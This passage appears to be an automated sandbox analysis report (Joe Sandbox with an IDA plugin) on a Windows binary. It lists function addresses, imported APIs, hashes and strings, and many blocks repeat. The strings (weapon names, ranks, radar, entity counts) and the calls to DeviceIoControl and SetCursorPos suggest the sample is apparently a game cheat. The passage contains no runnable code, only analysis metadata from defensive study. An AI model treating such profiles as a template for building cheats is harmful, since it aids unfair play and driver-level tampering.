memcpy.VCRUNTIME140 ref: 00007FF68B4C2B2C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C355E
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C3565
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C356C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C3573
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C357A
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C3581
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C3588
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C35E1

Strings

Diamond 2, xrefs: 00007FF68B4C26FD

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$memcpy
String ID: Diamond 2
API String ID: 3063020102-3782135954
Opcode ID: cc0daa8317402374e0d7fc753a8de104d8d3d9cc7654f14c34212ace3d465571
Instruction ID: 1bea3b42e01dd70de905890a918ca8b11f89db7c987606532b2c0903f2a3bb0f
Opcode Fuzzy Hash: cc0daa8317402374e0d7fc753a8de104d8d3d9cc7654f14c34212ace3d465571
Instruction Fuzzy Hash: 0482E122A18BC5C9E7218F3598523F92351FF5DB98F04933AE95C976BADF78A184D300

Function 00007FF68B4C2733 Relevance: 60.3, APIs: 33, Strings: 1, Instructions: 763COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF68B4C7EF0: memcpy.VCRUNTIME140 ref: 00007FF68B4C7F20

Part of subcall function 00007FF68B4C7E40: memcpy.VCRUNTIME140 ref: 00007FF68B4C7E86

memcpy.VCRUNTIME140 ref: 00007FF68B4C2B05
memcpy.VCRUNTIME140 ref: 00007FF68B4C2B13
memcpy.VCRUNTIME140 ref: 00007FF68B4C2B2C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C355E
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C3565
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C356C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C3573
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C357A
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C3581
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C3588
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C35E1

Strings

Unreal, xrefs: 00007FF68B4C2733

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$memcpy
String ID: Unreal
API String ID: 3063020102-2085349250
Opcode ID: 3a0f16b0ce6fb060f4bc70d45fafc54e40f47c3bfc18f45a5f7d8be7d00c8fc7
Instruction ID: 388930aec8bcc452bbcbe504e69d246c0ba7da6f1b93ea6fe92599f4f8d09a36
Opcode Fuzzy Hash: 3a0f16b0ce6fb060f4bc70d45fafc54e40f47c3bfc18f45a5f7d8be7d00c8fc7
Instruction Fuzzy Hash: 7782E022A18BC5C9E7218F3598523F92351FF5DB98F04933AE95C976BADF78A184D300

Function 00007FF68B4C272A Relevance: 60.3, APIs: 33, Strings: 1, Instructions: 763COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF68B4C7EF0: memcpy.VCRUNTIME140 ref: 00007FF68B4C7F20

Part of subcall function 00007FF68B4C7E40: memcpy.VCRUNTIME140 ref: 00007FF68B4C7E86

memcpy.VCRUNTIME140 ref: 00007FF68B4C2B05
memcpy.VCRUNTIME140 ref: 00007FF68B4C2B13
memcpy.VCRUNTIME140 ref: 00007FF68B4C2B2C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C355E
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C3565
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C356C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C3573
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C357A
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C3581
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C3588
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C35E1

Strings

Champion, xrefs: 00007FF68B4C272A

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$memcpy
String ID: Champion
API String ID: 3063020102-3157597410
Opcode ID: 144ded6759e24a764fb614f588dbe56c86c1a34ce66523a0084d2929ab5e4519
Instruction ID: 5cddca6c7f4f0037cb56e59f6a41a1052be3332f0fe6c6f15e7105372178e9ba
Opcode Fuzzy Hash: 144ded6759e24a764fb614f588dbe56c86c1a34ce66523a0084d2929ab5e4519
Instruction Fuzzy Hash: 4A82E122A18BC5C9E7218F3598523F92351FF5DB98F04933AE95C976BADF78A184D300

Function 00007FF68B4C271B Relevance: 60.3, APIs: 33, Strings: 1, Instructions: 763COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF68B4C7EF0: memcpy.VCRUNTIME140 ref: 00007FF68B4C7F20

Part of subcall function 00007FF68B4C7E40: memcpy.VCRUNTIME140 ref: 00007FF68B4C7E86

memcpy.VCRUNTIME140 ref: 00007FF68B4C2B05
memcpy.VCRUNTIME140 ref: 00007FF68B4C2B13
memcpy.VCRUNTIME140 ref: 00007FF68B4C2B2C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C355E
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C3565
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C356C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C3573
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C357A
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C3581
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C3588
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C35E1

Strings

Elite, xrefs: 00007FF68B4C271B

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$memcpy
String ID: Elite
API String ID: 3063020102-374124821
Opcode ID: 433a740ac596b3775d7cd27aed4025e363777eca8a87c0d73b1bc22af3f4a7da
Instruction ID: 2ee856e36a13197df5a173f21356c2e453e580512a94bdcd8b2ce348f7cbc0d3
Opcode Fuzzy Hash: 433a740ac596b3775d7cd27aed4025e363777eca8a87c0d73b1bc22af3f4a7da
Instruction Fuzzy Hash: F882E122A18BC5C9E7218F3598523F92351FF5DB98F04933AE95C976BADF78A184D300

Function 00007FF68B4C26D0 Relevance: 60.3, APIs: 33, Strings: 1, Instructions: 763COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF68B4C7EF0: memcpy.VCRUNTIME140 ref: 00007FF68B4C7F20

Part of subcall function 00007FF68B4C7E40: memcpy.VCRUNTIME140 ref: 00007FF68B4C7E86

memcpy.VCRUNTIME140 ref: 00007FF68B4C2B05
memcpy.VCRUNTIME140 ref: 00007FF68B4C2B13
memcpy.VCRUNTIME140 ref: 00007FF68B4C2B2C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C355E
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C3565
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C356C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C3573
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C357A
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C3581
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C3588
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C35E1

Strings

Platinum 2, xrefs: 00007FF68B4C26D0

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$memcpy
String ID: Platinum 2
API String ID: 3063020102-2901091026
Opcode ID: 23b73752a61641d6e1cfc265b77130eb62e62d3bdf11c2ba42d930f9df2cc77e
Instruction ID: 7d339716707577c089f77282455411f5349ec7917890aef7d633b8164018d82f
Opcode Fuzzy Hash: 23b73752a61641d6e1cfc265b77130eb62e62d3bdf11c2ba42d930f9df2cc77e
Instruction Fuzzy Hash: BF82E122A18BC5C9E7218F3598523F92351FF5DB98F04933AE95C976BADF78A184D300

Function 00007FF68B4C26C1 Relevance: 60.3, APIs: 33, Strings: 1, Instructions: 763COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF68B4C7EF0: memcpy.VCRUNTIME140 ref: 00007FF68B4C7F20

Part of subcall function 00007FF68B4C7E40: memcpy.VCRUNTIME140 ref: 00007FF68B4C7E86

memcpy.VCRUNTIME140 ref: 00007FF68B4C2B05
memcpy.VCRUNTIME140 ref: 00007FF68B4C2B13
memcpy.VCRUNTIME140 ref: 00007FF68B4C2B2C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C355E
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C3565
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C356C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C3573
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C357A
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C3581
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C3588
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C35E1

Strings

Platinum 1, xrefs: 00007FF68B4C26C1

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$memcpy
String ID: Platinum 1
API String ID: 3063020102-904033128
Opcode ID: 0de8fe864511a510f1376c65c64b49df295a1d055d671f00c5868a459a86609d
Instruction ID: 629676a588688cd8eab72a78afe8d944a656368c27c556a647cf79f2f7020b8a
Opcode Fuzzy Hash: 0de8fe864511a510f1376c65c64b49df295a1d055d671f00c5868a459a86609d
Instruction Fuzzy Hash: 0982E122A18BC5C9E7218F3598523F92351FF5DB98F04933AE95C976BADF78A184D300

Function 00007FF68B4C26EE Relevance: 60.3, APIs: 33, Strings: 1, Instructions: 763COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF68B4C7EF0: memcpy.VCRUNTIME140 ref: 00007FF68B4C7F20

Part of subcall function 00007FF68B4C7E40: memcpy.VCRUNTIME140 ref: 00007FF68B4C7E86

memcpy.VCRUNTIME140 ref: 00007FF68B4C2B05
memcpy.VCRUNTIME140 ref: 00007FF68B4C2B13
memcpy.VCRUNTIME140 ref: 00007FF68B4C2B2C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C355E
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C3565
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C356C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C3573
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C357A
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C3581
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C3588
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C35E1

Strings

Diamond 1, xrefs: 00007FF68B4C26EE

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$memcpy
String ID: Diamond 1
API String ID: 3063020102-2020049192
Opcode ID: 140d053bcd2fbc3d0ce6ff18c15cb116db7409568f4bb662c7ecc0d977282dbf
Instruction ID: 43b698c3e181b2f01a93e85a650094e97f2f41d019ab363760d71a2b01930e02
Opcode Fuzzy Hash: 140d053bcd2fbc3d0ce6ff18c15cb116db7409568f4bb662c7ecc0d977282dbf
Instruction Fuzzy Hash: 2E82E122A18BC5C9E7218F3598523F92351FF5DB98F04933AE95C976BADF78A184D300

Function 00007FF68B4C26DF Relevance: 60.3, APIs: 33, Strings: 1, Instructions: 763COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF68B4C7EF0: memcpy.VCRUNTIME140 ref: 00007FF68B4C7F20

Part of subcall function 00007FF68B4C7E40: memcpy.VCRUNTIME140 ref: 00007FF68B4C7E86

memcpy.VCRUNTIME140 ref: 00007FF68B4C2B05
memcpy.VCRUNTIME140 ref: 00007FF68B4C2B13
memcpy.VCRUNTIME140 ref: 00007FF68B4C2B2C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C355E
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C3565
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C356C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C3573
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C357A
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C3581
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C3588
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4C35E1

Strings

Platinum 3, xrefs: 00007FF68B4C26DF

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$memcpy
String ID: Platinum 3
API String ID: 3063020102-3689681476
Opcode ID: 7ec2125242782399e3b68455f6c0d1c755060b70530a9672af63ad0da23814b5
Instruction ID: 5fd69c66550a89b62f63e138a2e64b4953499d0755629bc720e9eb35e422aaed
Opcode Fuzzy Hash: 7ec2125242782399e3b68455f6c0d1c755060b70530a9672af63ad0da23814b5
Instruction Fuzzy Hash: F582E122A18BC5C9E7218F3598523F92351FF5DB98F04933AE95C976BADF78A184D300

Function 00007FF68B4BDD90 Relevance: 58.4, APIs: 14, Strings: 19, Instructions: 656COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF68B4B2E10: DeviceIoControl.KERNEL32 ref: 00007FF68B4B2ECD

_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF68B4BE86A

Strings

Storm Scout Sniper Rifle, xrefs: 00007FF68B4BD8DA
Thermal Scoped Assault Rifle, xrefs: 00007FF68B4BDC04
Pump Shotgun, xrefs: 00007FF68B4BD988
Rifl, xrefs: 00007FF68B4BE1D7
Reaper Sniper Rifle, xrefs: 00007FF68B4BD827
Burst Assault Rifle, xrefs: 00007FF68B4BDB8A
Bolt-Action Sniper Rifle, xrefs: 00007FF68B4BD861
Scoped Assault Rifle, xrefs: 00007FF68B4BDC3E
Rapid Fire SMG, xrefs: 00007FF68B4BDAEF
Tactical Assault Rifle, xrefs: 00007FF68B4BDBCA
Snip, xrefs: 00007FF68B4BE240
Tactical Shotgun, xrefs: 00007FF68B4BD9D4
Heavy Sniper Rifle, xrefs: 00007FF68B4BD8A0
Shot, xrefs: 00007FF68B4BE110
Hunting Rifle, xrefs: 00007FF68B4BD914
Charge Shotgun, xrefs: 00007FF68B4BDA14
Assault Rifle, xrefs: 00007FF68B4BDB3E
Compact SMG, xrefs: 00007FF68B4BDAAF
Suppressed SMG, xrefs: 00007FF68B4BDA63

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: ControlDevice_invalid_parameter_noinfo_noreturn
String ID: Assault Rifle$Bolt-Action Sniper Rifle$Burst Assault Rifle$Charge Shotgun$Compact SMG$Heavy Sniper Rifle$Hunting Rifle$Pump Shotgun$Rapid Fire SMG$Reaper Sniper Rifle$Rifl$Scoped Assault Rifle$Shot$Snip$Storm Scout Sniper Rifle$Suppressed SMG$Tactical Assault Rifle$Tactical Shotgun$Thermal Scoped Assault Rifle
API String ID: 4009212252-766504981
Opcode ID: 0730dd66f811846eef82fdf937a227102711d08cba7481cd52c056ab4cda209f
Instruction ID: a79a96671ff794dc4d1321ac208851368c7d805eb2220c03d8cbc5017e56839e
Opcode Fuzzy Hash: 0730dd66f811846eef82fdf937a227102711d08cba7481cd52c056ab4cda209f
Instruction Fuzzy Hash: 4E52C422E18A86C5FB218F7984423BC6350BF9D754F44473ADA6D676FAEF78A581C300

Function 00007FF68B4C36B0 Relevance: 58.2, APIs: 27, Strings: 6, Instructions: 440keyboardwindowCOMMON

Download Yara Rule

APIs

PeekMessageA.USER32 ref: 00007FF68B4C371C
TranslateMessage.USER32 ref: 00007FF68B4C372D
DispatchMessageA.USER32 ref: 00007FF68B4C373A
GetForegroundWindow.USER32 ref: 00007FF68B4C3740
GetWindow.USER32 ref: 00007FF68B4C375A
SetWindowPos.USER32 ref: 00007FF68B4C3780
GetClientRect.USER32 ref: 00007FF68B4C379C
ClientToScreen.USER32 ref: 00007FF68B4C37AD
GetCursorPos.USER32 ref: 00007FF68B4C37DF
GetAsyncKeyState.USER32 ref: 00007FF68B4C3814
SetWindowPos.USER32 ref: 00007FF68B4C38B2
GetClientRect.USER32 ref: 00007FF68B4C38FA
QueryPerformanceCounter.KERNEL32 ref: 00007FF68B4C3928
GetKeyState.USER32 ref: 00007FF68B4C3965
GetKeyState.USER32 ref: 00007FF68B4C397B
GetKeyState.USER32 ref: 00007FF68B4C3991
ClientToScreen.USER32 ref: 00007FF68B4C39DD
SetCursorPos.USER32 ref: 00007FF68B4C39E9
GetActiveWindow.USER32 ref: 00007FF68B4C39FC
GetCursorPos.USER32 ref: 00007FF68B4C3A0F
ScreenToClient.USER32 ref: 00007FF68B4C3A24
GetAsyncKeyState.USER32 ref: 00007FF68B4C3A87
rand.API-MS-WIN-CRT-UTILITY-L1-1-0 ref: 00007FF68B4C3AB4
GetAsyncKeyState.USER32 ref: 00007FF68B4C3AFE
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF68B4C3DB3
DestroyWindow.USER32 ref: 00007FF68B4C3DF4

Strings

##radar, xrefs: 00007FF68B4C226B
VUUU, xrefs: 00007FF68B4C3ABD
Visible Entities: , xrefs: 00007FF68B4BFEDF
Hands, xrefs: 00007FF68B4C2407
Unranked, xrefs: 00007FF68B4C2742
Nearby Entities: , xrefs: 00007FF68B4C00BF

Memory Dump Source

Source File: 00000000.00000002.2680257319.00007FF68B481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF68B480000, based on PE: true

Associated: 00000000.00000002.2680228507.00007FF68B480000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680314796.00007FF68B4CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680359501.00007FF68B4FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680387099.00007FF68B4FD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680422542.00007FF68B517000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2680450383.00007FF68B519000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff68b480000_4tXm5yPtiy.jbxd

Similarity

API ID: StateWindow$Client$AsyncCursorMessageScreen$Rect$ActiveCounterDestroyDispatchForegroundPeekPerformanceQueryTranslatefreerand
